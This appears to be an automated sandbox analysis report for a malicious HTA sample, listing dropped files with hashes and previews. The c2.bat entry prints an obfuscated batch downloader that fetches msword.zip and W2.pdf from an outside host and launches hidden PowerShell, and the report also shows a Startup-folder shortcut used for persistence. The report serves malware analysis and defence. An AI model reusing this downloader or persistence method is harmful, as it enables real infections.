                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vz1sobh0.352.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_walkybo1.o4m.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 16-53-06-099.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393)
                                                                                      Category:dropped
                                                                                      Size (bytes):16525
                                                                                      Entropy (8bit):5.345946398610936
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                      MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                      SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                      SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                      SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                      Malicious:false
                                                                                      Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):15114
                                                                                      Entropy (8bit):5.316729273655208
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:NEZuRzoFZgx7YKC/Q63eClkJIktcCzzNt2vzx5CS9iriYwDrpE6JBwBT6ASemn/H:+gK
                                                                                      MD5:F7ECED059BA699C6BE049A1C61EF747C
                                                                                      SHA1:37B53094A258CAE052572D9E67002006699FE2C8
                                                                                      SHA-256:A677B415612E28C8C483D3B52BF2B507DF3F39F4257F406A6807F649085370B0
                                                                                      SHA-512:9BA616D5CF2D4BA6F15B99F4705BEF28CBEB76DA5363475A46EEABAA65B5EC48994179255A836E1523FDDE045C8FAC954AFF5FF57C59AD9CFC738595754A369F
                                                                                      Malicious:false
                                                                                      Preview:SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:113-0500 ThreadID=7476 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:115-0500 ThreadID=7476 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:116-0500 ThreadID=7476 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:116-0500 ThreadID=7476 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=3083020e-76d7-453a-8510-ba80c1b0dbd6.1736632386113 Timestamp=2025-01-11T16:53:06:116-0500 ThreadID=7476 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):29752
                                                                                      Entropy (8bit):5.3912860750047775
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r1:Z
                                                                                      MD5:5FB433C652F45286B8D358C9298B5B87
                                                                                      SHA1:9C520613114E40613A761251BBF643C938D150D5
                                                                                      SHA-256:7EAE589D224D5FFD4EA82CBB43485EDEB9DDD496850A3DCC981EAE6CC85E0323
                                                                                      SHA-512:44EFD08ED1E6E7FDB34BD724AACD138666D7CF9017C154F242A82144B4DBC7C005B018B4C75747A4F042D16FD5CFD1DFCF271969F3E819482D48F6AE561E30A0
                                                                                      Malicious:false
                                                                                      Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\1ebd602a-cca0-4ebc-9b17-58a7a5996478.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                      Category:dropped
                                                                                      Size (bytes):1407294
                                                                                      Entropy (8bit):7.97605879016224
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\3af19a0b-46ff-4877-ac01-1d6786f19fdc.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                      Category:dropped
                                                                                      Size (bytes):386528
                                                                                      Entropy (8bit):7.9736851559892425
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                      Malicious:false
                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\474ce6ec-a6c0-482a-8e0d-f6d625058992.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                      Category:dropped
                                                                                      Size (bytes):758601
                                                                                      Entropy (8bit):7.98639316555857
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                      MD5:3A49135134665364308390AC398006F1
                                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                      Malicious:false
                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\af046056-597d-4a1c-ab6b-7cb90f7fbab5.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                      Category:dropped
                                                                                      Size (bytes):1419751
                                                                                      Entropy (8bit):7.976496077007677
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                      MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                      SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                      SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                      SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                      C:\Users\user\AppData\Local\Temp\c2.bat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (904), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3634
                                                                                      Entropy (8bit):5.236008723707643
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:m+CdvloxEWaqNh3b3Z/OnSZtn5+Gs8HNSqCBXAyY:oCjaob3Z2SnE8tSqCB9Y
                                                                                      MD5:87022BBA9DB0F800B26D9609ACBBCF49
                                                                                      SHA1:D7BE8CC8D4CFFCCE0BD7D361037BBE575E49CC6A
                                                                                      SHA-256:1F6CE0F5CD3793AAEA9B3F9DE99F04679B8DB2F1056532982D835E665006ECE7
                                                                                      SHA-512:B7BE35A7A8EF40CF5326EFD77EB4A2EE05162B241267695C6927F12340BE3720AF299D37AFB5F02025EF8948E71C8A4F8CC21B5C805C9DD777797694C033D53F
                                                                                      Malicious:true
                                                                                      Preview:@%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%..set url=https://myguyapp.com/msword.zip..s%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%rjdee%g%dwYNwJT%u%MoAZng%y%pXoEB%a%Yy%p%UKZM%p%ctS%.%Jnv%c%YYTHkw%o%wkC%m%GFePO%/%jldFiSl%m%IP%s%xK%w%hLcFpDndPO%o%DaOxa%r%ZM%d%AR%.%f%z%GzD%i%e%p%JevMulL%..set url2=https://myguyapp.com/W2.pdf..s%hwvwRF%e%QuDLrd%t%JICNv% %PxorhwP%u%aYH%r%hotHXeBZtg%l%oJKbuFDbgq%2%yHfekdVP%=%NdKRoGUgr%h%xKSx%t%rvRKBSleIX%t%SpSm%p%wbQdk%s%R%:%Dizx%/%HHLDZ%/%es%m%XjoF%y%J%g%olMBNbeo%u%DVZtkXm%y%MsH%a%LyuRF%p%Eryft%p%idiglSH%.%odKAWwiYof%c%CtLK%o%KjljBrysB%m%o%/%GQYaqs%W%LDmDZbmha%2%sFQKV%.%vIMk%p%VuXimjsr%d%acamBo%f%nrMe%..p%wsZX%o%zbulUZgp%w%inxp%e%aiWTgYV%r%KUWANAEWb%s%oDEk%h%gPNeE%e%ibNOiBI%l%LHUUm%l%ETUgg% %jDR%-%GUoW%W%j%i%OZUiVG%n%xC%d%EvHpV%o%BVeSOp%w%kLnyCABxV%S%Xb%t%IKytjHq%y%Pw%l%jYJgLlEn%e%cWXrPRDt% %xRzJFYoSU%H%BYa%i%aNxNnfpSO%d%mJLHttj%d%PEn

                                                                                      C:\Users\user\AppData\Local\Temp\msword.zip

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3291904
                                                                                      Entropy (8bit):5.7211736584910335
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:1SPkwlaGwxOe3J7k4b6ioP8ZbmrJju41nK4AzaVQeAYgIBlu:10wMe3Lb6R8Zbm59K4PVgI3u
                                                                                      MD5:612EC869CA4C87B5BF6C1B44522FDA28
                                                                                      SHA1:43E7850657B61E9AC7341413C203C6E834266EA7
                                                                                      SHA-256:AB2B6D3C849A207A93CFEC18A684EF980AE681C4F901A3B12858A2C3AC05ECCC
                                                                                      SHA-512:BE5BE0BDB010FB4EA58CED7FB45731FB720B6AFBBDCAA1E971CE9B278CDE71F7C8E73D28A0FA8744F1604FF176A50032D63B9F5850909133CD113E69B2A53EA5
                                                                                      Malicious:true
                                                                                      Preview:PK........n.(Z.............. .msword.exeux.............UT....V~g.e~g.e~g.{|T..?~..dI6.".F..!(...M\..rB.Y\Xw..pQ..+.M....%n..............V."&.$(.(<..|.H...u.......3s6..{.....~.5{...g>...g......A.............o?..+^.*.0.OW....t.....Uu+.[r_..KV.X)..UST..(Z....6..}+..L....6.........t..5.4.=.........K...R+{.b...\.&.(.U.La.....i..c....xIe..tA.P.'.....7.B.......1.C.{..G..O3.Hy.....7......!..._......C...^..8.....r.Z....g.D}....H..O.[.D^".w]....#.....L......[....?.W...+..N. .d.=..&....8..p#L...i..f.Jd..A.../G.W..........P{"=.".v.<.......F*..j...3.h..+N]..M....G...$...:....b.3>..1|....Q.....'..6$#5IA.Y..e.h..b.\........y.Ws<.n...I=.u:^lk.E.<d..t........U/...S9...D...y..........zSz~%..I...q..z.f@.+y....Y..4....G..5..Iz~.J.@s..P..aS.C<N$.!j pA..!..z^H.}..K.<...~H*B...a]j.M.R.b-..;.....h....;..ZUlm.O..e.........f9...er...=.Z_...l/}...l~...n.-3....[.!.ok.+.%.}.N%G....L..D.*2.....;.-.i.q.3G.....nP.bY..P+l......X|.,..v9+.#Za...7.........:b.M.Hv

                                                                                      C:\Users\user\AppData\Local\Temp\msword\msword.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):597659152
                                                                                      Entropy (8bit):4.333929871564731
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:2418E6B81076BF97B0D0659309561185
                                                                                      SHA1:5C9393008097E0C2EE82197E46CA879B0156D15D
                                                                                      SHA-256:9DCF3E57C4962A4C5BA0866AF3C16E7D16427448FD75E1D78F7C3D9A70675BFA
                                                                                      SHA-512:339267CBCD9073BD21FEC145814F73D0165FE58F1DB306F2AE678780C691B32C9B9C46C3218848D9EE34BD4A2669B23E6A792735FA5351391B8B33632C3EB54D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8............@....................................#..@.................................4........@...2......................d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....2...@...4..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >), ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):100
                                                                                      Entropy (8bit):4.889436845812483
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5mKIGXQxjNLiqB5Gr4Fy:HRYF5yjowkn23mKpkNx5G0y
                                                                                      MD5:A34A0DAF277C13FC5AFF64C0A7247999
                                                                                      SHA1:FD9B47B23BD20B9903D8842AC8C17A9F96677E93
                                                                                      SHA-256:1534FD0EC0B91D4DDD6A250523DEE4BDB80DCBDF9DF1440606B3BF31AB80E814
                                                                                      SHA-512:7B45CB2183C7307EF7C7A89926D2289E5A49C49E53F2A635CFF49FC8898D2D346C686E6DF5F15280A918E6FDA78AE75E97B1769D5536293E75119E3ECDCE0E9A
                                                                                      Malicious:true
                                                                                      Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" ..

                                                                                      C:\Users\user\Downloads\W2.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PDF document, version 1.4, 2 pages
                                                                                      Category:dropped
                                                                                      Size (bytes):69437
                                                                                      Entropy (8bit):7.717554924401452
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:fGPGTXkz5QcYykzbvwj42yCuTP1mRPLHLxqf/f8LcivAM7jQlVdl8gbUvjODSrY5:o3z5jkzbvWg1qzndS1zSrpaaW
                                                                                      MD5:296FBCEB79C89BCFFD636CB2D80C57F7
                                                                                      SHA1:7AC0E8C3BBCA5B78289EC48D0785B03DE4E1F581
                                                                                      SHA-256:568CB24BFE35FD292AA0923413E1707B057A281059759AF52FC4392F901A8383
                                                                                      SHA-512:902BB7F56B5E5C49B8798154B5A79B0D820C41308A0BAA1346CBB2FE0C04BB2D6A756D27AF598E59EC0A688FBB19351F42338E58EE6DE2EC8A87566130EE7929
                                                                                      Malicious:true
                                                                                      Preview:%PDF-1.4.%.....1 0 obj.<</Type/XObject/Subtype/Image/Width 2549/Height 3299/Length 35678/ColorSpace[/Indexed[/CalRGB<</Gamma[2.2 2.2 2.2]/Matrix[0.41239 0.21264 0.01933 0.35758 0.71517 0.11919 0.18045 0.07218 0.9504]/WhitePoint[0.95043 1 1.09]>>] 1(......)]/DecodeParms<</BitsPerComponent 1/Predictor 15/Columns 2549/Colors 1>>/Intent/Perceptual/BitsPerComponent 1/Filter/FlateDecode>>stream.x...Mo...y.^..Q@.3.w..x9...z#...q. ...|...U-...(5J%Re..^.f..F.m.".N..P/..7P(.J....Z....9...C.h....w.w......dO2}D..#A.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:HTML document, ASCII text, with CRLF line terminators
                                                                                      Entropy (8bit):4.734787895976378
                                                                                      TrID:
                                                                                      • HyperText Markup Language (12001/1) 40.67%
                                                                                      • HyperText Markup Language (11501/1) 38.98%
                                                                                      • HyperText Markup Language (6006/1) 20.35%
                                                                                      File name:c2.hta
                                                                                      File size:1'424 bytes
                                                                                      MD5:ad959a16fe9d80c18b39e7b57bf7ca71
                                                                                      SHA1:16cd44bda6f1ab39811c990b316f2176a28542f0
                                                                                      SHA256:41b558fa4bdb281c1b7bf0fc73937b4e4f1caa3beccb752f3082cb665680aa40
